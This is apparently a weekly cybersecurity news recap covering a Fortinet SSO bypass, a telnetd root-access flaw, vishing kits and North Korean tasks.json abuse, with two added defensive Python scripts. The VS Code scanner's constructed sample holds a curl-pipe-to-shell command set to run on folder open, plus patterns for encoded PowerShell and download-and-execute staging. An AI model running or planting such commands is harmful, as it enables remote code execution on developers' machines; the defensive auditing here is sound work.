Weekly Recap of Cybersecurity Threats and Innovations
# Threat of the Week: Incompletely Patched Fortinet Firewalls Exploited Again
Fortinet confirmed it is working on a complete fix for a FortiCloud SSO authentication bypass after reports of fresh exploitation on fully patched firewalls. The earlier patches for CVE-2025-59718 and CVE-2025-59719 were incomplete, and the new activity still bypasses SSO login authentication, without valid credentials, via crafted SAML messages whenever the FortiCloud SSO feature is enabled.
- Because the exploited path goes through an incomplete patch for CVE-2025-59718 and CVE-2025-59719, a device that is current on patches is not necessarily safe; patch level alone is not evidence of exposure or non-exposure here.
- Until the complete fix ships, restrict administrative access on edge devices to trusted sources and disable FortiCloud SSO logins by turning off the “admin-forticloud-sso-login” setting.
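Turning the setting off is a one-line change per device, but on a fleet the useful check is whether any box still has it enabled. The following Python is an added example, not Fortinet's tooling or the page's own code: it audits FortiOS configuration dumps for the setting. It assumes the CLI layout `config system global` / `set admin-forticloud-sso-login enable|disable` / `end` and that the dumps come from `show full-configuration` (plain `show` omits values still at their default); the sample dumps are constructed.

```python
"""Audit FortiOS configuration dumps for the FortiCloud SSO admin-login setting.

Added example, not Fortinet's own tooling. It assumes the FortiOS CLI layout
    config system global
        set admin-forticloud-sso-login {enable|disable}
    end
and that the input is the output of 'show full-configuration', which lists
every setting (plain 'show' omits values still at their default). The sample
dumps in SAMPLE_CONFIGS are constructed for illustration.
"""
import re
from typing import Optional

SSO_KEY = "admin-forticloud-sso-login"
SET_RE = re.compile(r"set\s+(\S+)\s+(.+)")


def forticloud_sso_state(config_text: str) -> Optional[str]:
    """Return 'enable', 'disable', or None when the setting is absent.

    The walk keeps a stack of open 'config'/'edit' blocks so that a matching
    'set' line only counts inside 'config system global', not in some other
    block that happens to use the same key name.
    """
    stack: list[str] = []
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # '#config-version=...' header lines
            continue
        if line.startswith("config "):
            stack.append(line[len("config "):].strip())
        elif line.startswith("edit "):
            stack.append(line[len("edit "):].strip())
        elif line in ("end", "next"):             # 'end' closes config, 'next' closes edit
            if stack:
                stack.pop()
        elif line.startswith("set ") and stack and stack[-1] == "system global":
            m = SET_RE.match(line)
            if m and m.group(1) == SSO_KEY:
                return m.group(2).strip().strip('"')
    return None


def audit(devices: dict[str, str]) -> dict[str, str]:
    """Map each device name to a verdict for a fleet of config dumps."""
    verdicts: dict[str, str] = {}
    for name, cfg in devices.items():
        state = forticloud_sso_state(cfg)
        if state == "enable":
            verdicts[name] = "EXPOSED: FortiCloud SSO login enabled"
        elif state == "disable":
            verdicts[name] = "ok: FortiCloud SSO login disabled"
        else:
            verdicts[name] = "unknown: setting absent (re-capture with 'show full-configuration')"
    return verdicts


# Constructed sample dumps; hostnames and addresses are not real devices.
SAMPLE_CONFIGS = {
    "fw-edge-1": """\
config system global
    set hostname "fw-edge-1"
    set admin-forticloud-sso-login enable
end
config system interface
    edit "port1"
        set ip 192.0.2.1 255.255.255.0
    next
end
""",
    "fw-edge-2": """\
config system global
    set hostname "fw-edge-2"
    set admin-forticloud-sso-login disable
end
""",
    "fw-lab": """\
config system global
    set hostname "fw-lab"
end
""",
}

if __name__ == "__main__":
    for device, verdict in audit(SAMPLE_CONFIGS).items():
        print(f"{device}: {verdict}")
```

An "unknown" verdict is not a clean bill of health: it only means the dump did not state the value, which is exactly what a plain `show` produces for a setting at its default. Re-capture with `show full-configuration` before signing off a device.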
# TikTok Joint Venture Ends U.S. Regulatory Uncertainty
TikTok officially announced it has formed a joint venture that allows the app to continue operating in the U.S., ending years of regulatory uncertainty. Under the deal, ByteDance sells its majority stake to an American group while retaining a 19.9% stake.
# VoidLink: AI-Built Linux Malware with Sophisticated Features
VoidLink, a malware family targeting Linux-based cloud servers, was likely generated almost entirely by artificial intelligence (AI). Its development plan and checkpoints point to sophisticated, modern capabilities, underscoring how a capable developer can use AI to amplify offensive output.
# Critical GNU InetUtils telnetd Flaw: Root Access Without Credentials
A critical flaw in the GNU InetUtils telnet daemon, tracked as CVE-2026-24061, affects every version from 1.9.3 up to and including 2.7. It allows an unauthenticated attacker to establish a Telnet session without valid credentials, yielding root-level access to the host. Telnet has no transport protection to begin with; any telnetd still reachable on a network should be inventoried now and either updated or switched off.
# Vishing Attacks: Identity Providers Compromised
Threat actors who specialize in voice phishing (vishing) have started using bespoke phishing kits that capture targets’ login credentials while also controlling the authentication flow in real time, so the victim is walked through each step of the login as the attacker needs it. The ShinyHunters extortion gang has claimed responsibility for some of these attacks.
# Contagious Interview: VS Code tasks.json Used to Deliver a New Backdoor
The North Korean threat actors behind the Contagious Interview campaign have added a delivery mechanism that abuses Microsoft Visual Studio Code (VS Code) to drop a previously unseen backdoor and gain remote code execution on developer systems. The attack chain relies on booby-trapped tasks.json files that run malicious commands from within the editor and install the malware.
# Contagious Interview: Malicious npm Package in Hosted Projects
The same North Korean group is also using the realHunters campaign to deliver a backdoor by embedding a malicious npm package in VS Code extensions hosted on Vercel, GitLab, or Bitbucket. The attackers then rely on legitimate shells and tasks.json files to install the malware.
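Both of the items above turn on the same primitive: a tasks.json that runs a command for the developer who opens the project. VS Code's documented tasks.json schema lets a task declare `"runOptions": {"runOn": "folderOpen"}`, which starts it as soon as the workspace is opened in a trusted window. The following Python, an added example rather than code from the page or from any vendor, scans a checkout for such auto-run tasks and flags download-and-execute patterns in their commands. The sample tasks.json is constructed (example.invalid is a reserved, non-resolving name) and the suspicious-pattern list is a heuristic, not a complete catalogue.

```python
"""Find VS Code tasks that run automatically when a folder is opened.

Added example, not code from the page or from any vendor. It relies on the
documented tasks.json schema: a task carrying
    "runOptions": {"runOn": "folderOpen"}
starts as soon as the workspace is opened in a trusted VS Code window. The
sample tasks.json below is constructed; example.invalid is a reserved name
that never resolves. SUSPICIOUS is a heuristic list, not a complete one.
"""
import json
import os
import re
import tempfile

SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", re.I),       # fetch and pipe to a shell
    re.compile(r"powershell.*\s-e(nc|ncodedcommand)?\s", re.I),    # encoded PowerShell
    re.compile(r"\b(iex|Invoke-Expression|Invoke-WebRequest|iwr)\b", re.I),
    re.compile(r"\bbase64\s+(-d|--decode)\b", re.I),              # decode-then-run staging
]


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside string literals (tasks.json is JSONC)."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # copy the escaped character too
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):       # skip to end of line, keep the newline
            j = text.find("\n", i)
            i = (n if j == -1 else j) - 1
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = (n if j == -1 else j + 2) - 1
        else:
            out.append(c)
        i += 1
    return "".join(out)


def parse_jsonc(text: str) -> dict:
    """Parse JSONC: strip comments, then drop trailing commas before } or ]."""
    return json.loads(re.sub(r",(\s*[}\]])", r"\1", strip_jsonc(text)))


def task_command(task: dict) -> str:
    """Reconstruct a task's command line from 'command' plus any 'args'."""
    parts = [task.get("command", "")]
    parts += [a if isinstance(a, str) else json.dumps(a) for a in task.get("args", [])]
    return " ".join(p for p in parts if p)


def auto_run_tasks(tasks_json: str) -> list[dict]:
    """Return every task that runs on folderOpen, with its command and a suspicion flag."""
    found = []
    for task in parse_jsonc(tasks_json).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command(task)
        found.append({"label": task.get("label", "<unlabeled>"), "command": cmd,
                      "suspicious": any(p.search(cmd) for p in SUSPICIOUS)})
    return found


def scan_tree(root: str) -> list[dict]:
    """Walk a checkout and report every folderOpen task in any .vscode/tasks.json."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) != ".vscode" or "tasks.json" not in files:
            continue
        path = os.path.join(dirpath, "tasks.json")
        with open(path, encoding="utf-8") as fh:
            try:
                tasks = auto_run_tasks(fh.read())
            except ValueError as exc:           # json.JSONDecodeError is a ValueError
                report.append({"path": path, "error": str(exc)})
                continue
        report.extend({"path": path, **t} for t in tasks)
    return report


# Constructed sample: looks like a harmless dependency helper, runs on open.
SAMPLE_TASKS_JSON = """{
  // "version" and "tasks" follow the VS Code tasks.json schema
  "version": "2.0.0",
  "tasks": [
    {
      "label": "install dependencies",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": {"runOn": "folderOpen"}
    },
    {"label": "build", "type": "shell", "command": "npm run build"}
  ]
}"""


def demo() -> list[dict]:
    """Write the constructed sample into a temporary checkout and scan it."""
    with tempfile.TemporaryDirectory() as root:
        vscode_dir = os.path.join(root, "repo", ".vscode")
        os.makedirs(vscode_dir)
        with open(os.path.join(vscode_dir, "tasks.json"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_TASKS_JSON)
        return scan_tree(root)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Run it against a freshly cloned "take-home assignment" before opening the folder in the editor. Any folderOpen task deserves a look even when the command is not flagged, since a plain `npm ci` still executes whatever install scripts the listed packages carry; and VS Code's workspace trust prompt only helps if the developer declines to trust unknown repositories.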
# Trending CVEs: Rapidly Exploited Security Flaws
- CVE-2026-24061 (GNU InetUtils telnetd): Unauthenticated access to the target system.
- CVE-2026-23760 (SmarterMail), CVE-2026-20045 (Cisco Unified Communications and Webex Calling Dedicated Instance): Actively exploited flaws in email and collaboration systems.
- CVE-2026-1245 (binary-parser), CVE-2025-68143, CVE-2025-68144, CVE-2025-68145 (Anthropic mcp-server-git): Flaws in open-source components, a Node.js parsing library and Anthropic’s Git MCP server respectively.
- Vivotek legacy camera models: Remote code execution without authentication.
# Other Notable Vulnerabilities
- Patched FortiGate devices exploited again: A new attack path works on fully patched devices despite the earlier fixes, as described in the Threat of the Week above.
- OpenKM software flaws: Multiple zero-day vulnerabilities disclosed, including ones that lead to remote code execution and file disclosure.
- Vivotek firmware vulnerability: Lets attackers execute arbitrary code as root without authentication.
# Recent Incidents
- Two Venezuelan nationals convicted for ATM jackpotting: The pair were convicted of conspiracy and computer crimes for an ATM jackpotting scheme that targeted older-model ATMs across the southeastern United States.
- Mamba PhaaS kit detailed: The Mamba phishing-as-a-service (PhaaS) kit, first observed in 2023, delivers malware through email lures that impersonate routine business communications.
- Stanley kit for malicious Chrome extensions offered for sale: A threat actor is selling a toolkit that builds malicious extensions and promises their publication on the Google Chrome Web Store.
# Conclusion: Emphasizing Security Awareness and Practices
Risk is no longer confined to specific tools; it spreads across everyday choices, from which repository a developer opens to which SSO feature stays enabled on an edge device. Small gaps become significant exposures, which is why routine vigilance matters. As attackers evolve, defenders must adapt just as quickly to stay resilient.
As a trusted cybersecurity platform, THN continuously monitors emerging trends and vulnerabilities, providing resources and insights to help enterprises protect themselves from growing cyber risks.